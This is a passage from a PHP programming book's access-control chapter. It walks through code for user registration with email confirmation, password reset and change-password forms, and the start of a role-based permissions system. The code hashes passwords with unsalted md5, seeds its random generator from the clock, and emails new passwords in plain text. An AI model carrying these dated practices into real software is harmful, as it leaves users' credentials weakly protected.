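    $safe = htmlspecialchars($url, ENT_QUOTES, 'UTF-8');
    $replace = '<a href="' . $safe . '">' . $safe . '</a>';
  } else {
    $replace = $url;
  }
  return str_replace('<confirm_url/>', $replace, $message);
}

echo fillConfirmUrl('Confirm here: <confirm_url/>',
    'http://localhost/signup.php', 'abc123', false), "\n";
// prints: Confirm here: http://localhost/signup.php?code=abc123
```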
  • 335. Access Control 311 The $listener variable stores the absolute URL of the script to which the confirm­ ation code should be submitted. It links to itself in our example script. This variable is set to reflect the folder setup of our testing environment, so make sure you change this variable to suit your own setup. The next step is to set up our database connection and instantiate our SignUp object: signup.php (excerpt) try { // Instantiate the PDO object for the database connection $db = new PDO($dsn, $user, $password); $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); // Instantiate the signup class $signUp = new SignUp($db, $listener, $frmName, $frmAddress, $subj, $msg, TRUE); Notice also that we’re opening a try block to catch any exceptions that may be thrown from the execution of the rest of the code. Any exceptions caught after this point—if the PDO connection fails for example—will display an appropriate message on the web page, instead of showing a PHP error. The next step is to check whether the page is being requested as part of a confirma­ tion—we’ll check for the presence of the $_GET['code'] variable: signup.php (excerpt) if (isset($_GET['code'])) { try { $signUp->confirm($_GET['code']); $display = $reg_messages['success']; } catch (SignUpException $e){ $display = $reg_messages['confirm_error']; } }
  • 336.
If the confirmation code is present, we call the SignUp->confirm method, supplying the code the page received. We then set the $display variable, which will contain the page title and message to display on our web page. If no exception was raised from the confirm method at this point in the script, we can assume all went well and set the $display variable to the success message. If, however, a SignUpException exception was thrown, we set the $display variable to the confirm_error message. You may remember that the SignUpException class was the base class for all our custom exceptions. By catching this class of exception, we’ll catch an instance of any of our custom exceptions.

If the confirmation code is not present, we prepare to display the registration form:

signup.php (excerpt)

  else
  {
    function cmpPass($element, $confirmPass)
    {
      $password = $GLOBALS['form']->getElementValue('password');
      return $password == $confirmPass;
    }
    function encryptValue($value)
    {
      return md5($value);
    }

The above are helper functions that will be used by our HTML_QuickForm object to validate and filter the registration form contents. The HTML_QuickForm object makes it very easy to construct the form and the form validation:

signup.php (excerpt)

    /* Make the form */
    // Instantiate the QuickForm class
    $form = new HTML_QuickForm('regForm', 'POST');
    // Register the compare function
    $form->registerRule('compare', 'function', 'cmpPass');
  • 337. Access Control 313 // The login field $form->addElement('text', 'login', 'Desired Username'); $form->addRule('login', 'Please provide a username', 'required', FALSE, 'client'); $form->addRule('login', 'Username must be at least 6 characters', 'minlength', 6, 'client'); $form->addRule('login', 'Username cannot be more than 50 characters', 'maxlength', 50, 'client'); $form->addRule('login', 'Username can only contain letters and numbers', 'alphanumeric', NULL, 'client'); // The password field $form->addElement('password', 'password', 'Password'); $form->addRule('password', 'Please provide a password', 'required', FALSE, 'client'); $form->addRule('password', 'Password must be at least 6 characters', 'minlength', 6, 'client'); $form->addRule('password', 'Password cannot be more than 12 characters', 'maxlength', 12, 'client'); $form->addRule('password', 'Password can only contain letters and numbers', 'alphanumeric', NULL, 'client'); // The field for confirming the password $form->addElement('password', 'confirmPass', 'Confirm Password'); $form->addRule('confirmPass', 'Please confirm password', 'required', FALSE, 'client'); $form->addRule('confirmPass', 'Passwords must match', 'compare', 'function'); // The email field $form->addElement('text', 'email', 'Email Address'); $form->addRule('email', 'Please enter an email address', 'required', FALSE, 'client'); $form->addRule('email', 'Please enter a valid email address', 'email', FALSE, 'client'); $form->addRule('email', 'Email cannot be more than 50 characters', 'maxlength', 50, 'client');
  • 338. 314 The PHP Anthology // The first name field $form->addElement('text', 'firstName', 'First Name'); $form->addRule('firstName', 'Please enter your first name', 'required', FALSE, 'client'); $form->addRule('firstName', 'First name cannot be more than 50 characters', 'maxlength', 50, 'client'); // The last name field $form->addElement('text', 'lastName', 'Last Name'); $form->addRule('lastName', 'Please enter your last name', 'required', FALSE, 'client'); $form->addRule('lastName', 'Last name cannot be more than 50 characters', 'maxlength', 50, 'client'); // The signature field $form->addElement('textarea', 'signature', 'Signature'); // Add a submit button called submit // and "Send" as the button text $form->addElement('submit', 'submit', 'Register'); /* End making the form */ After we’ve defined the registration form, we use the HTML_Quickform->validate method to check that the form has been submitted and that it validates. If it does validate, we can proceed to build the array of form data our SignUp object needs to create a new signup record: signup.php (excerpt) if ($form->validate()) { // Apply the encryption filter to the password $form->applyFilter('password', 'encryptValue'); // Build an array from the submitted form values $submitVars = array( 'login' => $form->getSubmitValue('login'), 'password' => $form->getSubmitValue('password'), 'email' => $form->getSubmitValue('email'), 'firstName' => $form->getSubmitValue('firstName'),
  • 339.
        'lastName' => $form->getSubmitValue('lastName'),
        'signature' => $form->getSubmitValue('signature')
      );

Since we’re using HTML_QuickForm, any slashes added by magic quotes are automatically removed from the submitted values; when you’re not using HTML_QuickForm, be sure to strip out the slashes if magic_quotes is enabled.

Next, we create the signup record and send the confirmation email. We want to wrap this in a try block in order to catch any possible exceptions:

signup.php (excerpt)

      try {
        $signUp->createSignup($submitVars);
        $signUp->sendConfirmation();
        $display = $reg_messages['email_sent'];
      }
      catch (SignUpEmailException $e)
      {
        $display = $reg_messages['email_error'];
      }
      catch (SignUpNotUniqueException $e)
      {
        $display = $reg_messages['signup_not_unique'];
      }
      catch (SignUpException $e)
      {
        $display = $reg_messages['signup_error'];
      }
    }

If no exceptions are thrown, we can set $display to an appropriate message that tells the user to expect the email. If exceptions are thrown, we can set $display to a message that’s appropriate for each one, because we defined several custom exception classes. Note that the more specific exceptions are caught before their base class, SignUpException.

If the form hasn’t been submitted yet, it’ll need to be shown to the user; we set $display to include the form HTML source:
  • 340. 316 The PHP Anthology signup.php (excerpt) else { // If not submitted, display the form $display = array( 'title' => 'New Registration', 'content' => $form->toHtml() ); } } } We’ve reached the end of the first try block, so we need to catch any remaining ex­ ception that may be thrown. If an exception is caught here, it won’t be one of our custom exceptions. Therefore, we need to make sure that the exception details are logged using the error_log function, and that the web page displays an appropriate message to inform the user that registration cannot be completed: signup.php (excerpt) catch (Exception $e) { error_log('Error in '.$e->getFile(). ' Line: '.$e->getLine(). ' Error: '.$e->getMessage() ); $display = $reg_messages['signup_error']; } ?> Now, the only task left to do is to produce the HTML source for the web page. Our $display variable has been set to an array value containing two elements—one for the page title and one for the page contents. This setting will display the registration form and a confirmation message, or an error message if something has gone wrong. These displays are inserted into the source code where appropriate:
  • 341.
signup.php (excerpt)

<!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <head>
    ⋮ HTML Head contents…
  </head>
  <body>
    <h1><?php echo $display['title']; ?></h1>
    <?php echo $display['content']; ?>
  </body>
</html>

The finished registration form should look like the one shown in Figure 10.3.

Figure 10.3. The finished registration form

And there we have it: a simple but fully functioning user registration system with email confirmation facility!
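One detail of the system above may deserve a second look on a current PHP installation: the encryptValue filter hashes passwords with md5, which is fast to brute-force. As a hedged alternative, and assuming PHP 5.5 or later, the built-in password_hash and password_verify functions could be swapped in. The function name hashPassword below is hypothetical. This sketch also assumes the password column is widened beyond the VARCHAR(50) used in this chapter (the PHP manual suggests 255 characters), and that the login check calls password_verify instead of comparing two hashes.

```php
<?php
// Hypothetical replacement for the encryptValue filter
function hashPassword($value)
{
  // PASSWORD_DEFAULT selects the algorithm PHP currently recommends
  // and generates a random salt for every call
  return password_hash($value, PASSWORD_DEFAULT);
}

$stored = hashPassword('secret123');

// At login time, verify the submitted password against the stored hash
var_dump(password_verify('secret123', $stored)); // bool(true)
var_dump(password_verify('wrong', $stored));     // bool(false)
```

Because each call uses a fresh salt, hashing the same password twice gives different strings, so stored hashes cannot be compared with == as the md5 values are.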
  • 342.
Discussion

So that you don’t grow bored, I’ve left a couple of pieces of the jigsaw puzzle for you to fill in yourself.

If a registered user exists who has the same username or email address as the one entered by the new registrant, the createSignup method throws an exception and the procedure is halted. If you’re happy using HTML_QuickForm, you might want to split this check into a separate method that HTML_QuickForm can apply as a validation rule for each field in the form. This approach should reduce frustration when users find that the account name they chose already exists: HTML_QuickForm will generate a message to inform them of this fact, preserve the rest of the values they entered, and allow them to try again with a different username.

If you plan to let users change their email addresses once their accounts are created, you’ll also need to confirm the new addresses before you store them in the user table. You should be able to reuse the methods provided by the SignUp class for this purpose. You might even consider reusing the signup table to handle this task. Some modifications will be required; you’ll want the confirm method to be able to update an existing record in the user table, for example. Be very careful that you don’t create a hole in your security, though. If you’re not checking for existing records in the user table, a user could sign up for a new account with details that match an existing row in the user table. You’ll then end up changing the email address of an existing user to that of a new user, which will cause you some embarrassment, at the very least.

How do I deal with members who forget their passwords?

Unfortunately, humans have a tendency to forget important information such as passwords, so a feature that allows users to retrieve forgotten passwords is an essential time saver. Overlook this necessity, and you can expect to waste a lot of time manually changing passwords for people who have forgotten them.

If you encrypt the passwords in your database, you’ll need a mechanism to generate a new password that, preferably, is easy to remember.
  • 343. Access Control 319 Be Careful with Password Hints A common tactic used in web site registration is to use simple questions as memory joggers should users forget their password. These questions can include “Where were you born?” and “What’s your pet’s name?” Yet details like this may well be common knowledge or easy for other users to guess. Solution Since we already have a valid email address for each account, as confirmed through our signup procedure in “How do I build a registration system?”, we just need to send the new password to that address. Our solution uses the user table from the previous sections: access_control.sql (excerpt) CREATE TABLE user ( user_id INT(11) NOT NULL AUTO_INCREMENT, login VARCHAR(50) NOT NULL DEFAULT '', password VARCHAR(50) NOT NULL DEFAULT '', email VARCHAR(50) DEFAULT NULL, firstName VARCHAR(50) DEFAULT NULL, lastName VARCHAR(50) DEFAULT NULL, signature TEXT NOT NULL, PRIMARY KEY (user_id), UNIQUE KEY user_login (login) ); The AccountMaintenance Class The AccountMaintenance class is a utility class that, among other things, will reset the password for a user’s account and generate an email to send the user the new password. Our class uses the following configuration settings: access_control.ini (excerpt) ; Access Control Settings ;web form variables e.g. $_POST['login'] [login_vars] login=login
  • 344. 320 The PHP Anthology ;user login table details [users_table] table=user col_id=user_id col_login=login col_password=password col_email=email col_name_first=firstName col_name_last=lastName To provide a consistent level of error handling, we define some custom exception classes: AccountMaintenance.class.php (excerpt) class AccountException extends Exception { public function __construct($message = null, $code = 0) { parent::__construct($message, $code); error_log('Error in '.$this->getFile(). ' Line: '.$this->getLine(). ' Error: '.$this->getMessage() ); } } class AccountDatabaseException extends AccountException {} class AccountUnknownException extends AccountException {} class AccountPasswordException extends AccountException {} class AccountPasswordResetException extends AccountException {} Our base class, AccountException, is a custom exception that ensures the exception details are logged using the error_log function. The subclasses represent different exception situations that might arise during account maintenance. We begin our AccountMaintenance class definition with the class properties:
  • 345. Access Control 321 AccountMaintenance.class.php (excerpt) class AccountMaintenance { protected $db; protected $cfg; private $words; $db will contain a PDO instance for our database connection, $cfg will store our configuration details, and $words will store the path to the random words file that’s used in password generation. The constructor simply stores the database object for future use by the class and loads the configuration file: AccountMaintenance.class.php (excerpt) public function __construct(PDO $db) { $this->db = $db; $this->cfg = parse_ini_file('access_control.ini', TRUE); } Since we save the user’s password in the database as an MD5 hash (a form of one- way encryption), we can no longer find out what the original password was. If members forget their passwords in such cases, you’ll have to make new ones for them. You could simply generate a random string of characters, but it’s important to remember that if you make your security systems too unfriendly, you’ll put off legitimate users. The resetPassword method generates a more human-friendly randomized password: AccountMaintenance.class.php (excerpt) function resetPassword($login, $email) { //Put the cfg vars into local vars for readability $user_table = $this->cfg['users_table']['table']; $user_id = $this->cfg['users_table']['col_id']; $user_login = $this->cfg['users_table']['col_login']; $user_pass = $this->cfg['users_table']['col_password']; $user_email = $this->cfg['users_table']['col_email'];
  • 346. 322 The PHP Anthology $user_first = $this->cfg['users_table']['col_name_first']; $user_last = $this->cfg['users_table']['col_name_last']; $user_sig = $this->cfg['users_table']['col_signature']; try { $sql = "SELECT " . $user_id . ", " . $user_login . ", " . $user_pass . ", " . $user_first . ", " . $user_last . " FROM " . $user_table . " WHERE " . $user_login . "=:login AND " . $user_email . "=:email"; $stmt = $this->db->prepare($sql); $stmt->bindParam(':login', $login); $stmt->bindParam(':email', $email); $stmt->execute(); $row = $stmt->fetchAll(PDO::FETCH_ASSOC); } catch (PDOException $e) { throw new AccountDatabaseException('Database error when' . ' finding user: '.$e->getMessage()); } First, we assign the configuration settings to local variables to make the code a little more readable. Next, we deal with the resetPassword method, which, when given a combination of a username and an email address, attempts to identify the corres­ ponding row in the user table. We use both the username and email to identify the row, so it’s a little more difficult for other people to reset your members’ passwords. Although there’s no risk of in­ dividuals stealing the new password (unless they have control over a member’s email account), it will certainly irritate people if their passwords are continually being reset. Requiring both the username and email address of the user makes the process a little more complex. If we can’t find a single matching row, we throw an exception:
  • 347.
AccountMaintenance.class.php (excerpt)

    if (count($row) != 1) {
      throw new AccountUnknownException('Could not find account');
    }

Next, we call the generatePassword method (which we’ll discuss in a moment) to create a new password:

AccountMaintenance.class.php (excerpt)

    try
    {
      $password = $this->generatePassword();

This method call is placed within a try block to catch the exception thrown by generatePassword if a new password cannot be generated. The resetPassword method then updates the user table with the new password (using md5 to encrypt it), and returns the new password in an array containing the user details:

AccountMaintenance.class.php (excerpt)

      $sql = "UPDATE " . $user_table . "
          SET
            " . $user_pass . "=:pass
          WHERE
            " . $user_id . "=:id";
      $stmt = $this->db->prepare($sql);
      // bindValue, because md5() returns a value, not a variable
      // that bindParam could bind by reference
      $stmt->bindValue(':pass', md5($password));
      $stmt->bindParam(':id', $row[0][$user_id]);
      $stmt->execute();
    }
    catch (AccountPasswordException $e)
    {
      // AccountPasswordResetException is the class defined earlier
      throw new AccountPasswordResetException('Error when' .
          ' generating password: '.$e->getMessage());
    }
    catch (PDOException $e)
    {
      throw new AccountDatabaseException('Database error when' .
  • 348. 324 The PHP Anthology ' resetting password: '.$e->getMessage()); } $row[0][$user_pass] = $password; return $row; } The addWords method is used to supply the class with an indexed array of words with which to build memorable passwords: AccountMaintenance.class.php (excerpt) function addWords($words) { $this->words = $words; } I’ve used a list of over one thousand words, stored in a text file, to build memorable passwords. Be aware that if anyone knows the list of words you’re using, cracking the new password will be significantly easier, so you should create your own list. generatePassword constructs a random password from the AccountMaintenance->words array, adding separators that can include any number from 0 to 9, or an underscore character: AccountMaintenance.class.php (excerpt) protected function generatePassword() { $count = count($this->words); if ($count == 0) { throw new AccountPasswordException('No words to use!'); } mt_srand((double)microtime() * 1000000); $seperators = range(0,9); $seperators[] = '_'; $password = array(); for ($i = 0; $i < 4; $i++) { if ($i % 2 == 0) { shuffle($this->words); $password[$i] = trim($this->words[0]);
  • 349. Access Control 325 } else { shuffle($seperators); $password[$i] = $seperators[0]; } } shuffle($password); return implode('', $password); } } The password itself will contain two words chosen at random from the list, as well as two random separators. The order in which these elements appear in the password is also random. The passwords this system generates might look something like 7correct9computer and 48courtclothes, which follow a format that’s relatively easy for users to remember. The Reset Password Page There’s one thing we need to finish our web site’s account maintenance feature: we need a web form that our users can fill in to request a password change or reset. First, we include all the packages we need: newpass.php (excerpt) <?php error_reporting(E_ALL); require_once 'Session.class.php'; require_once 'AccountMaintenance.class.php'; require_once 'HTML/QuickForm.php'; require_once 'Mail.php'; require_once 'Mail/mime.php'; require_once 'dbcred.php'; We then set the error reporting level to E_ALL with the error_reporting function, since we’re using PEAR packages that will cause E_Strict errors under PHP 5. Of course, we need to include our AccountMaintenance class file. We’ll also be using the PEAR HTML_Quickform and Mail_mime packages. The dbcred.php file contains the database credentials we’ll need to connect to our database. Next, we create the variables we need:
  • 350. 326 The PHP Anthology newpass.php (excerpt) $reg_messages = array( 'email_sent' => array( 'title' => 'Check your email', 'content' => '<p>Thank you. An email has been sent to:</p>' ), 'email_error' => array( 'title' => 'Email Problem', 'content' => '<p>Unable to send your details.<br />' . 'Please contact the site administrators.</p>' ), 'no_account' => array( 'title' => 'Account Problem', 'content' => '<p>We could not find your account.<br />' . 'Please contact the site administrators.</p>' ), 'reset_error' => array( 'title' => 'Password Reset Problem', 'content' => '<p>There was an error resetting your' . ' password.<br />Please contact the site administrators.' . '</p>' ) ); $yourEmail = 'you@yourdomain.com'; $subject = 'Your password'; $msg = 'Here are your login details. Please change your password.'; The $reg_messages variable contains an array of page titles and messages that will be used in the web page at various stages of the registration process. $yourEmail, $subject, and $msg are used in the creation of the email notification. Next, we build our form with PEAR::HTML_Quickform: newpass.php (excerpt) try { // Instantiate the QuickForm class $form = new HTML_QuickForm('passwordForm', 'POST'); // Add a header to the form $form->addElement('header', 'MyHeader', 'Forgotten Your Password?');
  • 351. Access Control 327 // Add a field for the email address $form->addElement('text', 'email', 'Enter your email address'); $form->addRule('email', 'Enter your email', 'required', FALSE, 'client'); $form->addRule('email', 'Enter a valid email address', 'email', FALSE, 'client'); // Add a field for the login $form->addElement('text', 'login', 'Enter your login name'); $form->addRule('login', 'Enter your login', 'required', FALSE, 'client'); // Add a submit button called submit with label "Send" $form->addElement('submit', 'submit', 'Get Password'); Notice also that we’re opening a try block: we want to catch any exceptions that may be thrown from the execution of the rest of the code. This precaution will allow us to display an appropriate message on the web page instead of a PHP error. If the form has been submitted, we can begin the password changing process: newpass.php (excerpt) if ($form->validate()) { $db = new PDO($dsn, $user, $password); $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $aMaint = new AccountMaintenance($db); $rawWords = file('words.txt'); $word = array_map('trim', $rawWords); $aMaint->addWords($word); We instantiate the PDO and AccountMaintenance classes and load our words file (I also trimmed off any whitespace that may appear before or after each word—just in case) so we can pass it to the addWords method. Next, we call the resetPassword method, passing the login and email values from the form as arguments:
  • 352. newpass.php (excerpt) $details = $aMaint->resetPassword( $form->getSubmitValue('login'), $form->getSubmitValue('email')); If all goes well, an email is sent via PEAR::Mail_Mime to inform the user of the new password: newpass.php (excerpt) $crlf = "\n"; $text = $msg . "\n\nLogin: " . $details[0]['login'] . "\nPassword: " . $details[0]['password']; $hdrs = array( 'From' => $yourEmail, 'Subject' => $subject ); $mime = new Mail_mime($crlf); $mime->setTXTBody($text); $body = $mime->get(); $hdrs = $mime->headers($hdrs); $mail = Mail::factory('mail'); // Send the message $succ = $mail->send($form->getSubmitValue('email'), $hdrs, $body); if (PEAR::isError($succ)) { $display = $reg_messages['email_error']; } else { $display = $reg_messages['email_sent']; $display['content'] .= '<p>' . $form->getSubmitValue('email') . '</p>'; } } The $display variable is set to a confirmation message, followed by the address the email was sent to, when the email is sent successfully; if sending fails, $display is set to the email error message instead.
  • 353. If the form hasn’t yet been submitted, we just display the form HTML: newpass.php (excerpt) else { $display = array( 'title' => 'Reset Password', 'content' => $form->toHtml() ); } } Finally, we catch any exceptions that may have occurred and display an appropriate message: newpass.php (excerpt) catch (AccountUnknownException $e) { $display = $reg_messages['no_account']; } catch (Exception $e) { error_log('Error in '.$e->getFile(). ' Line: '.$e->getLine(). ' Error: '.$e->getMessage() ); $display = $reg_messages['reset_error']; } ?> The HTML of the Reset Password page looks like this: newpass.php (excerpt) <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> ⋮ HTML Head contents… </head> <body>
  • 354. 330 The PHP Anthology <h1><?php echo $display['title']; ?></h1> <?php echo $display['content']; ?> </body> </html> Figure 10.4 shows the page’s display. Figure 10.4. The Reset Password page You can add a link to the bottom of your login form so that the user is able to access the Reset Password page. Here’s an example: <a href="newpass.php">Forgotten your password?</a> How do I let users change their passwords? A good design test for many PHP applications is whether users can change their passwords without needing to log back into the application afterwards. Provided you construct your application carefully, your users should be able to go about their business without further ado after changing their passwords. It’s important to be considerate to your site’s users if you want them to stick around!
  • 355. Solution If we return for a minute to the session-based authentication mechanism we discussed earlier in this chapter, you’ll remember that the login and MD5-hashed password are stored in session variables and rechecked on every new page by the Auth class. The trick is to change the value of the password in both the session variable and the database when users change their passwords. We can perform this trick with a small modification to the AccountMaintenance class—found in “How do I deal with members who forget their passwords?”—and the addition of a new form. Modifying AccountMaintenance With a little tweaking of the AccountMaintenance class to add a method for changing passwords, we should be able to handle the job fairly easily. The changePassword method requires an instance of the Auth class (found in “How do I create a class to control access to a section of the site?”), the old password, and the new password as arguments: AccountMaintenance.class.php (excerpt) public function changePassword($auth, $oldPassword, $newPassword) { $var_login = $this->cfg['login_vars']['login']; $user_table = $this->cfg['users_table']['table']; $user_login = $this->cfg['users_table']['col_login']; $user_pass = $this->cfg['users_table']['col_password']; At the beginning of the method, we store some of the configuration settings in local variables to help the readability of the rest of the method. The method then instantiates a new Session object (which we saw in “How do I create a session class?”) and attempts to find the user record in the database: AccountMaintenance.class.php (excerpt) $session = new Session(); try { $sql = "SELECT * FROM " . $user_table . "
  • 356. WHERE " . $user_login . " = :login AND " . $user_pass . " = :pass"; $stmt = $this->db->prepare($sql); $stmt->bindValue(':login', $session->get($var_login)); $stmt->bindValue(':pass', md5($oldPassword)); $stmt->execute(); $result = $stmt->fetchAll(PDO::FETCH_ASSOC); } catch (PDOException $e) { throw new AccountDatabaseException('Database error when' . ' finding user: '.$e->getMessage()); } The method first performs a database lookup to find the record of the user who’s using the current login details—obtained from the session information—and the old password. The values are bound with bindValue rather than bindParam, because bindParam binds a variable by reference and so cannot take the result of a function call directly. If a PDOException is thrown, the method throws one of our custom exceptions, AccountDatabaseException. The results of the database lookup are checked—if anything but a single matching record is returned, the method will throw an AccountUnknownException: AccountMaintenance.class.php (excerpt) if (count($result) != 1) { throw new AccountUnknownException('Could not find account'); } Finally, if no exceptions have been thrown, the method updates the password information in the database with the new password: AccountMaintenance.class.php (excerpt) try { $sql = "UPDATE " . $user_table . " SET " . $user_pass . " = :pass
  • 357. WHERE " . $user_login . " = :login"; $stmt = $this->db->prepare($sql); $stmt->bindValue(':login', $session->get($var_login)); $stmt->bindValue(':pass', md5($newPassword)); $stmt->execute(); $auth->storeAuth($session->get($var_login), $newPassword); } catch (PDOException $e) { throw new AccountDatabaseException('Database error when' . ' updating password: '.$e->getMessage()); } } After we update the information in the user table, the current session information is also updated via the Auth->storeAuth method. Again, if the operation throws a PDOException, we throw an AccountDatabaseException. It’s a good idea to ask the user to enter the old password before changing it over and giving them access with a new one. Perhaps the user logged in at an Internet café and then left, forgetting to log out, or worse, his or her session was hijacked electronically. Requiring the old password limits the potential for damage, as it prevents anyone who “takes over” the session from being able to change the password and thus assume total control. Instead, the newcomer’s only logged in as long as the session continues. (You may also wish to ask a user to reenter the password before completing any major actions—like making a credit card purchase—for this very reason.) The Change Password Form This web page form will show you how the changePassword method can easily be used in your registration system. We start by including all the classes and other files we’ll need: changepass.php (excerpt) <?php error_reporting(E_ALL); require_once 'Session.class.php';
  • 358. require_once 'Auth.class.php'; require_once 'AccountMaintenance.class.php'; require_once 'HTML/QuickForm.php'; require_once 'dbcred.php'; We set the error reporting level to E_ALL with the error_reporting function, as we’re using PEAR packages, which will cause E_STRICT errors under PHP 5. We then include our custom classes for session, authorization, and account management, the PEAR::HTML_QuickForm package, and our database credentials file. Next, we set the $reg_messages array to hold the page content for the different form outcomes: changepass.php (excerpt) $reg_messages = array( 'success' => array( 'title' => 'Password Changed', 'content' => '<p>Your password has been changed' . ' successfully.</p>' ), 'no_account' => array( 'title' => 'Account Problem', 'content' => '<p>We could not find your account.<br />' . 'Please contact the site administrators.</p>' ), 'change_error' => array( 'title' => 'Change Password Problem', 'content' => '<p>There was an error changing your' . ' password. Please contact the site administrators,' . ' or click ' . '<a href="' . $_SERVER['PHP_SELF'] . '">here</a> to' . ' try again.</p>' ) ); We then test to find out whether the user is currently authorized to see the Change Password form, with the assistance of the Auth class:
  • 359. Access Control 335 changepass.php (excerpt) try { $db = new PDO($dsn, $user, $password); $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $auth = new Auth($db, 'login.php', 'secret'); At this point, we open a try block; we want to catch any exceptions that may be thrown from the execution of the rest of the code. Catching any exceptions from this point will allow us to display an appropriate message on the web page instead of a PHP error. We instantiate the PDO and Auth classes; if the user isn’t authorized, he or she will be redirected to the login form. And if all’s well, we start building the Change Password form with PEAR::HTML_QuickForm: changepass.php (excerpt) $form = new HTML_QuickForm('changePass', 'POST'); function cmpPass($element, $confirm) { $password = $GLOBALS['form']->getElementValue('newPassword'); return $password == $confirm; } $form->registerRule('compare', 'function', 'cmpPass'); After instantiating the HTML_QuickForm object, we define and register the function cmpPass that will be used to validate the password fields, to ensure that the password and password confirmation fields match. Then we add the form: changepass.php (excerpt) $form->addElement('header', 'MyHeader', 'Change your password'); // Add a field for the old password $form->addElement('password', 'oldPassword',
  • 360. 'Current Password'); $form->addRule('oldPassword', 'Enter your current password', 'required', false, 'client'); // Add a field for the new password $form->addElement('password', 'newPassword', 'New Password'); $form->addRule('newPassword', 'Please provide a password', 'required', false, 'client'); $form->addRule('newPassword', 'Password must be at least 6 characters', 'minlength', 6, 'client'); $form->addRule('newPassword', 'Password cannot be more than 50 characters', 'maxlength', 50, 'client'); $form->addRule('newPassword', 'Password can only contain letters and ' . 'numbers', 'alphanumeric', NULL, 'client'); // Add a field for password confirmation $form->addElement('password', 'confirm', 'Confirm Password'); $form->addRule('confirm', 'Please confirm your password', 'required', false, 'client'); $form->addRule('confirm', 'Your passwords do not match', 'compare', false, 'client'); // Add a submit button $form->addElement('submit', 'submit', 'Change Password'); If the form has been submitted, we can attempt to change the password: changepass.php (excerpt) if ($form->validate()) { $aMaint = new AccountMaintenance($db); $aMaint->changePassword($auth, $form->getSubmitValue('oldPassword'), $form->getSubmitValue('newPassword') ); $display = $reg_messages['success']; }
  • 361. Access Control 337 On validation of the form, we instantiate an AccountMaintenance object and call the changePassword method. If no exceptions are thrown, we set the $display variable to the success message. If the form has not yet been submitted and validated, we display the form contents: changepass.php (excerpt) else { // If not submitted, display the form $display = array( 'title' => 'Change Password', 'content' => $form->toHtml() ); } } The final task of our main script is to catch any possible exceptions and display appropriate page content: changepass.php (excerpt) catch (AccountUnknownException $e) { $display = $reg_messages['no_account']; } catch (Exception $e) { error_log('Error in '.$e->getFile(). ' Line: '.$e->getLine(). ' Error: '.$e->getMessage() ); $display = $reg_messages['change_error']; } ?> The HTML content of the Change Password page is as follows:
  • 362. changepass.php (excerpt) <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> ⋮ HTML Head contents… </head> <body> <h1><?php echo $display['title']; ?></h1> <?php echo $display['content']; ?> </body> </html> Finally, the new Change Password page can be seen in Figure 10.5. Figure 10.5. The new Change Password page Discussion Now that you know how to allow users to change their passwords, it should be no problem for you to change other account settings, such as the first and last names and the signature—simply add the details to the AccountMaintenance class. If you want to allow users to change their email addresses, you’ll need to examine the registration procedure used earlier in “How do I build a registration system?”, and modify the SignUp class. You should make sure that users confirm a new email address before you allow them to change it.
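One way to approach the "other account settings" idea above is to build the UPDATE statement from a whitelist of columns. The following is only a sketch under stated assumptions: buildProfileUpdate is a hypothetical helper, not a method of the book's AccountMaintenance class, and the column names are taken from the user table used in this chapter.

```php
<?php
// Hypothetical helper (an assumption for illustration, not the book's code).
// Builds a parameterized UPDATE for a whitelisted set of profile columns.
function buildProfileUpdate($table, $loginColumn, array $allowed, array $changes)
{
    $assignments = array();
    $params = array();
    foreach ($changes as $column => $value) {
        // Skip anything that is not an explicitly allowed column name
        if (!in_array($column, $allowed, true)) {
            continue;
        }
        $assignments[] = $column . ' = :' . $column;
        $params[':' . $column] = $value;
    }
    if (count($assignments) == 0) {
        throw new InvalidArgumentException('No valid columns to update');
    }
    $sql = 'UPDATE ' . $table . ' SET ' . implode(', ', $assignments)
         . ' WHERE ' . $loginColumn . ' = :login';
    return array($sql, $params);
}

// The 'password' key is dropped because it is not in the whitelist.
list($sql, $params) = buildProfileUpdate(
    'user',
    'login',
    array('firstName', 'lastName', 'signature'),
    array('firstName' => 'Jack', 'password' => 'ignored')
);
echo $sql, "\n";
```

A caller would then add the ':login' value from the session to $params and pass the array to execute() on a statement prepared from $sql. Keeping the column names in a whitelist means user input only ever reaches the query as bound values.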
  • 363. How do I build a permissions system? In the previous sections, we built an authentication system that provided global security for your web site. But, consider this: are all the members of your site equal? You probably don’t want all of your users to have access to edit and delete articles, for example. To deal with this issue, you need to add to the security system further functionality that allows you to assign permissions to groups of members, permitting only these users to perform specific actions. Rather than assign permissions to single accounts, which would quickly become a nightmare to administer, we’ll build a permissions system in terms of users, groups, and permissions. Users (login accounts) will be assigned to groups, which will have names like Administrators, Authors, Managers, and so on. Permissions reflect actions that users will be allowed to perform within the site, and they will also be assigned to groups. From an administration perspective, this system will be easy to manage, as it’ll be a simple matter to see which permissions a particular group has, and which users are assigned to that group. This kind of access control is known as role-based access control. If you’d like to read more on the theory of role-based access control, the web site of the US Government National Institute of Standards and Technology has a complete section on it.11 Solution Let’s leap in and build our permission system. Setting Up the Database Building the permissions system initially requires the construction of many-to-many relationships between database tables. This is explained as follows: ■ A user can belong to many groups. ■ A group may have many users. ■ A permission can be assigned to many groups. ■ A group may have many permissions. 11 http://csrc.nist.gov/rbac/
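Before moving to the database, the users, groups, and permissions model described above can be sketched with plain PHP arrays. This is only an illustration: the user names, the function names permissionsFor and userCan, and the sample assignments are assumptions made for the example, not part of the book's code.

```php
<?php
// Illustrative data only: users, groups, and permissions are made up.
$userGroups = array(
    'alice' => array('Authors'),
    'bob'   => array('Authors', 'Administrators'),
);
$groupPermissions = array(
    'Authors'        => array('view', 'create', 'edit'),
    'Administrators' => array('view', 'create', 'edit', 'delete'),
);

// Collect the distinct permissions a user gains through all of their groups.
function permissionsFor($user, array $userGroups, array $groupPermissions)
{
    $permissions = array();
    $groups = isset($userGroups[$user]) ? $userGroups[$user] : array();
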